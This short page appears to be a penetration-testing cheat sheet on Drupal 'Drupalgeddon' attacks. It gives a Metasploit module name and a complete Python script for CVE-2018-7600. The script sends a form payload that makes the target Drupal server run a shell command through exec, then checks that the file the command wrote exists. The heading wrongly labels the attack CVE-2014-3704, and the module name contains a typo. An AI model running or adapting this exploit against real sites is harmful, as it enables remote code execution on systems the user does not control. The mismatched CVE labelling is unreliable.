
Drupalgeddon or CVE-2014-3704 (October 15, 2014 patch)


use exploit/multi/http/drupa_drupageddon

Drupalgeddon python exploit made by Vitalii Rudnykh https://github.com/a2u/CVE-2018-7600

#!/usr/bin/env python3
import sys
import requests

target = input('Enter target url (example: https://domain.ltd/): ')

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
# example:
# proxies = {'http': '', 'https': ''}
# verify = False
proxies = {}
verify = True

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "EXPLOITED" | tee hello.txt'}

r = requests.post(url, proxies=proxies, data=payload, verify=verify)
check = requests.get(target + 'hello.txt', proxies=proxies, verify=verify)
if check.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')

Last updated

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